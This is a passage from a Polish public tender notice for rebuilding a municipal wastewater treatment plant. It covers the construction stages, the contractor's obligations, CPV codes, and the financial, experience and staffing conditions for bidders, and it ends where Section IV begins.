W etapie IV ścieki przepływają przez uruchomiony w etapie III tymczasowy układ oczyszczania. W celu wykonania adaptacji w budynku technicznym 1 należy systematycznie wyłączać z ruchu poszczególne urządzenia mechaniczne (od etapu III). Priorytetem jest takie realizowanie adaptacji budynku technicznego 1 aby jak najszybciej można było zainstalować oczyszczalnię mechaniczną. Po rozruchu oczyszczalni mechanicznej należy ścieki z budynku krat wstępnych skierować do przepompowni ścieków ogólnych i nadmiarowych, którą należy poddać rozruchowi. W tym etapie ścieki oczyszczone mechanicznie skierowane  do reaktora biologicznego poprzez tymczasowy układ tłoczenia. W tym celu należy przewidzieć wynajem pompy wraz z układem sterowania na okres ok. 60 dni oraz wykonać tymczasowy rurociąg tłoczny ze studzienki S28 do komory predenitryfikacji reaktora biologicznego  200, długość, ok 30 mb + 8 kolan,
Do czasu budowy i rozruchu stacji zlewczej należy zaniechać przyjmowania ścieków dowożonych taborem asenizacyjnym. W miarę postępu rozruchu oczyszczalnia ścieków pracować będzie zgodnie z założeniami w dokumentacji projektowej. Eksploatacja nowego ciągu technologicznego realizowana będzie w oparciu o zalecenia grupy rozruchowej wytypowanej z ramienia Wykonawcy. 
 V etap
W etapie V  należy wykonać następujące prace:
a) rozruch przepompowni ścieków oczyszczonych mechanicznie (ob. nr 4A),
b) budowa i rozruch następujących obiektów:
    - wiat technologicznych osadu (ob. nr 12),
    - punkt zlewny ścieków dowożonych (ob. nr 6)
Opis przepływu ścieków w etapie V
W etapie V ścieki przepływają przez wybudowaną oczyszczalnię. Eksploatacja nowej oczyszczalni ścieków realizowana będzie w oparciu o zalecenia grupy rozruchowej wytypowanej z ramienia Wykonawcy oraz opracowaną instrukcję eksploatacji. 
Uwaga:
Wykonawca zobowiązany jest do opracowania Programu rozruchu opartego na zamieszczonych powyżej wytycznych oraz zapewnić nadzór technologiczny nad prawidłowym funkcjonowaniem oczyszczalni ścieków w trakcie wykonywania przebudowy obiektu. Wykonawca uwzględni wykonanie wszystkich prac dodatkowych związanych z utrzymaniem obiektu w ruchu.
W ramach rozruchu technologicznego należy osiągnąć efekt technologiczny zgodny z założeniami w dokumentacji projektowej.
Harmonogram rzeczowo-finansowy Wykonawca zobowiązany jest złożyć wraz z ofertą. W ciągu 10 dni od dnia podpisania umowy, Wykonawca zobowiązany jest przedłożyć zaktualizowany harmonogram rzeczowo-finansowy zaakceptowany prze Inspektora nadzoru i Zamawiającego.


UWAGI!
1)	wszystkie zastosowane urządzenia muszą być serwisowane na terenie Polski,
2)	czas reakcji serwisu nie dłuższy niż 48 h od momentu zgłoszenia awarii,  w przypadku naprawy trwającej dłużej niż 48 h Wykonawca zapewni urządzenie zastępcze,
3)	w okresie gwarancji muszą być skalkulowane koszty obowiązkowych autoryzowanych serwisów i przeglądów.
4.	Szczegółowy opis elementów przedmiotu zamówienia stanowią załączniki:
- Załącznik nr 10 do SIWZ  Dokumentacja projektowa.
- Załącznik nr 11 do SIWZ  Specyfikacja Techniczna Wykonania i Odbioru Robót
- Załącznik nr 12 do SIWZ  Przedmiar robót (należy traktować jako materiał pomocniczy do określenia przedmiotu zamówienia!)
5.	Podstawą do określenia przedmiotu zamówienia przy kalkulowaniu ceny ryczałtowej jest projekt budowlany oraz Specyfikacja Techniczna Wykonania i Odbioru Robót.
6.	Jeżeli zapisy w przedmiarach robót, STWiOR lub dokumentacji projektowej wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie urządzeń i materiałów, należy je traktować jako niezobowiązujące propozycje projektanta (służące prawidłowemu zrozumieniu projektu). Zamawiający zgodnie z art. 29 ust. 3 Pzp dopuszcza oferowanie rozwiązań równoważnych. Pod pojęciem równoważności rozumieć należy, iż zagwarantują one realizację zamówienia w zgodzie z wydanym pozwoleniem na budowę i opisem przedmiotu zamówienia oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w w/w dokumentach. Zastosowane urządzenia winny spełniać funkcje, jakiej mają służyć, być kompatybilne z pozostałymi urządzeniami tak aby zespół urządzeń dawał zamierzony (zaprojektowany) efekt, nie mogą wpływać na zmianę rodzaju i zakresu robót budowlanych.
7.	W sytuacji, gdy Wykonawca zamierza zastosować inne materiały i urządzenia niż podane w dokumentacji projektowej (materiały i urządzenia równoważne) winien dołączyć do oferty wykaz zawierający materiały i urządzenia zawarte w dokumentacji projektowej oraz podać ich równoważniki (nazwy materiałów i urządzeń zaproponowanych w ofercie)  Załącznik nr 8 do SIWZ. Do wykazu wówczas należy dołączyć stosowne dokumenty zawierające parametry techniczne zaproponowanych równoważnych materiałów i urządzeń.
8.	Zgodnie z art. 30 ust. 5 pzp, wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. Ocena możliwości zastosowania proponowanego urządzenia lub rozwiązania równoważnego powinna zawierać dla każdego urządzenia minimum analizę: 
	parametrów technologicznych proponowanych urządzeń lub rozwiązań równoważnych,
	zgodność parametrów technologicznych proponowanych urządzeń lub rozwiązań równoważnych z pozostałymi zaprojektowanymi urządzeniami lub rozwiązaniami technologicznymi oraz zaprojektowanymi instalacjami technologicznymi, 
	gabarytów, kształtów i rozwiązań konstrukcyjnych proponowanych urządzeń równoważnych w stosunku do gabarytów zaprojektowanych pomieszczeń oraz przestrzeni na ich montaż w komorach zbiorników, w tym możliwość ich montażu, demontażu i podejść do czynności obsługowych i serwisowych, szerokości przejść dla pracowników obsługi, wielkości otworów drzwiowych, włazów technologicznych itp.,
	rozwiązań materiałowych, 
	podejść i połączeń z instalacjami technologicznymi, 
	ciężaru urządzeń, sprawdzenia obliczeń wytrzymałości stropów, udźwigu urządzeń do czynności obsługowych itp., 
	innych informacji potwierdzających równoważność proponowanego urządzenia lub rozwiązania. 
9.	Wykonawca dobierając inne materiały lub urządzenia lub rozwiązania równoważne do zaproponowanych w dokumentacji projektowej, bierze na siebie odpowiedzialność za prawidłowe działanie oczyszczalni ścieków (określone w warunkach gwarancji) jak i wymagany stopień oczyszczenia ścieków podany w dokumentacji projektowej. Wykonawca jest odpowiedzialny za jakość zastosowanych materiałów, urządzeń, instalacji i armatury, za montaż i uruchomienie oraz ich zgodność z dokumentacją projektową, wymaganiami specyfikacji technicznej.
10.	Zamawiający nie uzna za urządzenia równoważne, spełniające wymagania określone dokumentacją projektową i STWiOR, żadnych urządzeń prototypowych.
11.	Roboty budowlane będą prowadzone podczas ciągłej pracy oczyszczalni ścieków eksploatowanej przez Zamawiającego. Stąd też Wykonawca zobowiązany jest do takiego prowadzenia robót, aby nie zakłócić pracy funkcjonującej oczyszczalni. Wykonawca ponosić będzie odpowiedzialność za naruszenie parametrów ścieków oczyszczonych powstałych z przyczyn leżących po jego stronie. W przypadku przekroczenia dopuszczalnych wskaźników zanieczyszczeń w ściekach oczyszczonych i nałożeniu kar przez Wojewódzki Inspektorat Ochrony Środowiska, Wykonawca zobowiązany jest pokryć finansowo wymierzoną karę. Przerwy technologiczne, np. spowodowane włączeniem nowych urządzeń, należy wcześniej zgłosić pisemnie i uzyskać pisemną zgodę Zamawiającego i Inspektora nadzoru inwestorskiego wraz z dopuszczalnym czasem wyłączenia z pracy urządzeń.
12.	Każdorazowa ingerencja w cykl biologicznego oczyszczania na istniejącej oczyszczalni musi być konsultowana pomiędzy technologami ze strony Wykonawcy i Zamawiającego.
13.	W związku z koniecznością utrzymania obiektu w ruchu, istniejący system SCADA musi zostać funkcjonalnie sprawny do momentu wdrożenia nowego systemu, obejmującego całą instalację oczyszczalni (stary i nowy system). Nowy system  licencja programu nie ograniczona czasowo wraz z prawami autorskimi dotyczącymi projektu systemu SCADA w momencie odbioru końcowego inwestycji stają się własnością Zamawiającego. Program musi mieć możliwość rozszerzenia lub ilość obsługiwanych danych musi mieć zapas minimum 10 % wolnych zmiennych.
14.	Do obowiązków Wykonawcy należy również:
1)	przekazanie Zamawiającemu wszelkich niezbędnych dokumentów, zgodnie z obowiązującym prawem, celem złożenia wniosku o wydanie pozwolenia na użytkowanie,
2)	przygotowanie wniosków materiałowych i harmonogramu dostawy urządzeń, w terminie do 3 mc. od przekazania placu budowy (czy materiał do zamontowania / wbudowania jest zgodny z umową) i przekazanie ich do zatwierdzenia Inspektorowi nadzoru,
3)	wykonanie i utrzymanie na swój koszt: zabezpieczenie terenu budowy, strzec znajdującego się tam mienia, zapewnić warunki bezpieczeństwa osób i mienia znajdującego się na jego terenie oraz strzec teren budowy przed wstępem osób nieupoważnionych,
4)	przeprowadzenie rozruchu hydraulicznego i technologicznego wraz z osiągnięciem założonych parametrów technologicznych,
5)	zapewnienie ciągłości pracy istniejących urządzeń oczyszczalni w tym ciągłość dostarczania ścieków do reaktora, procesów natleniania komór nitryfikacji, odwadniania osadów, recyrkulacji wewnętrznej i zewnętrznej osadu, systemu monitoringu, wizualizacji, sterowania pracą urządzeń,
6)	 dostarczenie dokumentacji techniczno-ruchowej urządzeń w j. polskim,
7)	dostarczenie instrukcji BHP obsługi poszczególnych urządzeń i całej oczyszczalni,
8)	dostarczenie instrukcji obsługi stanowiskowych i całej oczyszczalni,
9)	przeprowadzenie szkolenia pracowników obsługi wskazanych przez zamawiającego,
10)	uzyskanie efektu technologicznego potwierdzonego analizami wykonanymi przez laboratorium posiadające akredytację,
11)	dostarczenie sprzętu BHP i p.poż,
12)	dostarczenie certyfikatów na zastosowane materiały,
13)	udzielenie -miesięcznej gwarancji na wykonany przedmiot zamówienia,
14)	przestrzeganie przepisów obowiązującego prawa w zakresie odpadów zawarte w ustawie z dn. 27.04.2001r. Prawo ochrony środowiska, ustawie z dn. 14.12.2012r. o odpadach,
15)	zapewnienie na własny koszt transportu odpadów do miejsc utylizacji i poniesienie kosztów utylizacji (w przypadku zaniechania przez Wykonawcę czynności porządkowych określonych w niniejszym punkcie, czynności te mogą zostać wykonane bez dodatkowego wezwania przez Zamawiającego na koszt Wykonawcy, co nastąpi przez potrącenie z wynagrodzenia Wykonawcy),
16)	przestrzeganie obowiązujących przepisów w zakresie ochrony BHP oraz Ochrony P.Poż.
15.	Zamawiający na podstawie art. 29 ust. 3a Pzp wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, osób wykonujących następujące czynności w zakresie realizacji zamówienia: 
- minimum 4 osoby wykonujące roboty ogólnobudowlane,
- minimum 4 osoby wykonujące roboty instalacyjne wod-kan i sieci technologiczne,
- minimum 2 osoby wykonujące roboty instalacyjne elektryczne i AKPiA. 
16.	W celu potwierdzenia wywiązywania się z obowiązku zatrudnienia w/w osób na umowę o pracę, wykonawca lub podwykonawca zobowiązany jest przedkładać stosowne Oświadczenie na każde żądanie Zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy lub podwykonawcy.
18.	Zamawiający w trakcie realizacji umowy, w przypadku powzięcia wątpliwości lub wiedzy o niewykonywaniu przez wykonawcę lub podwykonawcę obowiązku, o którym mowa w ust. 16, ma prawo do kontroli spełnienia przez wykonawcę lub podwykonawcę powyższego wymagania, w szczególności poprzez poinformowanie Państwowej Inspekcji Pracy. W przypadku, gdy wynik kontroli PIP wykaże nieprawidłowości dotyczące nie dopełnienia w/w obowiązku, Zamawiający naliczy kary umowne, których wysokość została określona we wzorze umowy (kara umowna w wysokości odpowiadającej minimalnemu wynagrodzeniu za pracę w wysokości brutto). Zamawiający zaleca, aby Wykonawca zobowiązał podwykonawców (np. poprzez zastosowanie odpowiednich zapisów w umowach) do zatrudnienia w/w osób na umowę o pracę, do dokumentowania i przedkładania dokumentów umożliwiających przeprowadzenie kontroli podwykonawcy. Wykonawca będzie odpowiedzialny za wykonanie tego obowiązku również w stosunku podwykonawców.
19.	W związku z art. 29 ust. 5 pzp Zamawiający wymaga, aby wejście i dojście do budynku socjalnego, musi być dostosowane do potrzeb osoby niepełnosprawnej. Drzwi wejściowe nie mogą być węższe niż 90 cm, a maksymalna szerokość drzwi zewnętrznych nie powinna być szersza niż 100 cm. Istotne jest to, żeby grubość skrzydła drzwi po otwarciu nie sprawiła, że pomniejszy się wymiar szerokości otworu w świetle ościeżnicy. Aby umożliwić osobie na wózku pokonanie progu w drzwiach wejściowych, należy zastosować  listwę przyprogową z małym spadkiem, wykonaną ze stali, aluminium lub utwardzonej gumy. Wszelkie elementy w drzwiach (wizjer, zamek, blokada) powinny znajdować się w zasięgu osoby niepełnosprawnej. Klamki powinny mieć ergonomiczne kształty i być wygodne; ponadto, drzwi muszą być wyposażone w szeroki uchwyt, który będzie stanowił pomoc dla osób z ograniczonym polem manewru rąk. Podjazd łagodny i dostosowany do wózków inwalidzkich.
20.	Wykonawca zobowiązuje się do zapewnienia obecności kierownika budowy minimum 4 godziny dziennie w dniach trwania robót budowlanych.
21.	Przedstawiciel Wykonawcy, w dniach prowadzenia robót, będzie obecny w miejscu realizacji inwestycji.

<br /><br /><b>II.5) Główny kod CPV: </b>45252100-9<br /><b> Dodatkowe kody CPV:</b>45252200-0,
                45110000-1,
                45111200-0,
                45262310-7,
                45262311-4,
                45223100-7,
                45262500-6,
                45261000-4,
                45410000-4,
                45442100-8,
                45320000-6,
                45421000-4,
                45432110-8,
                45430000-0,
                45340000-2,
                45331210-1,
                45231300-8,
                45100000-8,
                45112730-1,
                45233220-7,
                45332000-3,
                45311000-0,
                45311000-7,
                45316100-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2019<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje warunku, gdyż działalność objęta przedmiotem zamówienia nie wymaga posiadania przez Wykonawcę specjalnych uprawnień<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że: 
a)	posiada minimalny roczny obrót w każdym z ostatnich lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 4.000.000,00 zł;
b)	posiada środki finansowe lub zdolność kredytową wystarczającą dla zapewnienia wymaganej płynności finansowej w okresie trwania umowy w wysokości co najmniej 3.000.000,00 zł;
c)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną na kwotę nie mniejszą niż  4.000.000,00 zł
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że :
a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jego działalności jest krótszy - w tym okresie, wykonał z należytą starannością co najmniej 2 zamówienia dotyczące przebudowy, modernizacji lub budowy oczyszczalni ścieków komunalnych wraz z rozruchem technologicznym o przepustowości średniodobowej nie mniejszej niż 1500 m3 oraz wartości robót nie mniejszej niż 5.000.000,00 zł brutto każda, w tym jedna z utrzymaniem obiektu w ruchu. Zakres zamówienia obejmował co najmniej: ciąg mechaniczny, ciąg biologicznego oczyszczania ścieków, ciąg gospodarki osadowej. Zamówienia muszą być zakończone wydaniem co najmniej protokołu odbioru lub świadectwem przejęcia. Zamawiający wymaga, aby niniejsza robota budowlana była wykonana w ramach jednego zamówienia.
Dla potrzeb oceny spełniania warunku określonego powyżej, jeżeli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez NBP w dniu publikacji ogłoszenia o zamówieniu w BZP, a jeżeli w dniu publikacji ogłoszenia o zamówieniu NBP nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia po dniu publikacji ogłoszenia o zamówieniu.
b)	dysponuje niżej wymienionymi osobami: 
	1 osobą do pełnienia funkcji Przedstawiciela Wykonawcy posiadającego następujące kwalifikacje: doświadczenie w zakresie organizacji i zarządzania co najmniej  jednym zakończonym kontraktem polegającym na budowie lub rozbudowie lub przebudowie oczyszczalni ścieków komunalnych. Osoba proponowana na to stanowisko powinna biegle władać językiem polskim lub dysponować kompetentnym tłumaczem we wszystkich godzinach pracy;
	1 osobą do pełnienia funkcji kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej bez ograniczeń oraz co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi z sektora środowiska w zakresie gospodarki wodno- ściekowej, w tym w/w doświadczenie w kierowaniu jako kierownik budowy na co najmniej jednym zakończonym kontrakcie polegającym na budowie lub rozbudowie lub przebudowie oczyszczalni ścieków komunalnych o przepustowości średniodobowej nie mniejszej niż 1500 m3 zrealizowanym w okresie ostatnich pięciu lat przed upływem terminu składania ofert; 
	1 osobą do pełnienia funkcji kierownika robót sanitarnych posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz co najmniej 5 lat doświadczenia na stanowisku kierownika robót sanitarnych;
	1 osobą do pełnienia funkcji kierownika robót elektrycznych posiadającą uprawnienia budowlane do kierowania robotami elektrycznymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz co najmniej 5 lat doświadczenia na stanowisku kierownika robót elektrycznych;
	1 osobą do pełnienia funkcji kierownika robót drogowych posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń oraz co najmniej 3 lat doświadczenia na stanowisku kierownika robót drogowych;
	1 specjalistą ds. AKPiA - niniejsza osoba ma posiadać następujące kwalifikacje: minimum 5letnie doświadczenie w realizacji robót z zakresu automatyki kontrolno-pomiarowej i automatyzacji, w tym w/w doświadczenie na co najmniej jednym zadaniu/kontrakcie zrealizowanym w okresie ostatnich pięciu lat przed upływem terminu składania ofert, polegającym na budowie lub rozbudowie lub przebudowie oczyszczalni ścieków komunalnych o przepustowości średniodobowej nie mniejszej niż 1500 m3. Posiadający świadectwo kwalifikacyjne wydane przez SEP: D  uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru, E- uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji;
	1 osobą technologa - niniejsza osoba ma posiadać następujące kwalifikacje: doświadczenie jako kierownik rozruchu technologicznego (lub na stanowisku równoważnym), na co najmniej dwóch zadaniach/kontraktach zrealizowanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert polegających na budowie lub rozbudowie lub przebudowie oczyszczalni ścieków komunalnych o przepustowości średniodobowej nie mniejszej niż 1500 m3.

Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn.: Dz. U. z 2016 r., poz. 290). Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów zgodnie z art. 104 Ustawy Prawo budowlane (tekst jedn.: Dz. U. z 2016 r., poz. 290) w myśl którego osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zamawiający dopuszcza także odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie  z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65). 
Zamawiający dopuszcza łączenie stanowisk kierownika budowy i kierownika robót branżowych, jeżeli osoba będzie posiadała wymagane doświadczenie i kwalifikacje oraz spełnia wymagania określone w SIWZ. Dopuszcza się również połączenia Przedstawiciela Wykonawcy ze stanowiskiem kierownika budowy/kierownika robót/specjalisty AKPiA/technologa.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, ze wykonawca nie zalega z opłacaniem podatków, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego lub inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	Sprawozdanie finansowe albo jego część, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami prawa kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiednio z opinią o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających na przykład obroty oraz aktywa i zobowiązania  za ten okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy  za ten okres;
2)	dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną na kwotę nie mniejszą niż 4.000.000,00 zł;
3)	informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na co najmniej 3.000.000,00 zł, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert;
4)	wykaz robót budowlanych (Załącznik nr 6 do SIWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;
5)	wykaz osób (Załącznik nr 7 do SIWZ), skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca zobowiązany jest do złożenia następujących dokumentów:
a)	Wypełniony formularz ofertowy (Załącznik nr 1 do SIWZ);
b)	Oświadczenie o braku podstaw wykluczenia oraz o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 2 i 3 do SIWZ, aktualne na dzień składania ofert. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu;
c)	dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego  w przypadku, gdy Wykonawcy składają wspólną ofertę, a podpisywana jest przez pełnomocnika;
d)	stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, albo z centralnej ewidencji i informacji o działalności gospodarczej (CEIDG);
e)	kosztorys ofertowy należy traktować jako pomocniczy i sporządzić metodą kalkulacji uproszczonej wraz z zestawieniem materiału i sprzętu w oparciu o załączony do SIWZ przedmiar robót. Na przedniej stronie kosztorysu należy podać stawkę roboczogodziny i wielkość narzutów;
f)	tabelę kluczowych urządzeń (Załącznik nr 8 do SIWZ);
g)	harmonogram rzeczowo  finansowy
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
